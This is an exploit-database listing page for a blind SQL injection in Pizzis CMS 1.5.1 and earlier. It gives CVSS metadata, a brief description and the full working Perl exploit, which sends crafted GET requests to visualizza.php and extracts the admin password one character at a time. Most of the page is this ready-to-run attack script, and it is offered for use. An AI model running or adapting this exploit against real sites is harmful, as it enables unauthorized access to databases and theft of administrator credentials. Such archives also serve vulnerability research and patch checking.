header-logo
Suggest Exploit
vendor:
Pizzis CMS
by:
darkjoker
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Pizzis CMS
Affected Version From: 1.5.2001
Affected Version To: 1.5.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:pizzis_cms:pizzis_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit

Pizzis CMS version 1.5.1 and prior are vulnerable to Blind SQL Injection. This exploit allows an attacker to extract the admin password from the database. The exploit uses a GET request to send a malicious query to the vulnerable application. The malicious query is crafted to extract the admin password from the database. The exploit then iterates through the characters of the password and prints it out.

Mitigation:

Upgrade to the latest version of Pizzis CMS
Source

Exploit-DB raw data:

--+++=============================================================+++--
--+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--


#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage {
   die
       "\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
       "\n[+] Author: darkjoker".
       "\n[+] Site  : http://darkjoker.net23.net".
       "\n[+] Usage : perl $0 <hostname> <path> <username>".
       "\n[+] Ex.   : perl $0 localhost /pizziscms admin".
       "\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
       "\n\n";
}

sub query {
   my ($user, $chr, $pos) = @_;
   my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user  = '${user}'),${pos},1))=${chr}";
   $query =~ s/ /%20/g;
   $query =~ s/'/%27/g;
   return $query;
}

sub exploit {
   my ($hostname, $path, $user, $chr, $pos) = @_;
   $chr = ord ($chr);

   my $sock = new IO::Socket::INET (
       PeerHost => $hostname,
       PeerPort => 80,
       Proto    => "tcp",
   ) or die $!;

   my $query = query ($user, $chr, $pos);
   my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n".
             "Host: ${hostname}\r\n".
             "Connection: Close\r\n\r\n";

   print $sock $request;

   my $reply;
   while (<$sock>)
   {
       $reply .= $_;

   }
   close ($sock);

   $reply =~ s/\s/ /g;

   $reply =~ /<h4>(.+)\/h4>/;
      if (length ($1) > 1)
   {
       return 1;
   }
   else
   {
       return 0;
   }
}

if (scalar (@ARGV) != 3)
{
   usage ();
}

my ($hostname, $path, $user) = @ARGV;

my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;

print "[+] Password: ";
while ($pos <= 32)
{
   if (exploit ($hostname, $path, $user, $key [$chr], $pos))
   {
       print $key [$chr];
       $chr = -1;
       $pos++;
   }
   $chr++;
}

print "\n";

# milw0rm.com [2009-01-08]

Navigation

Suggest Exploit

Services By CQR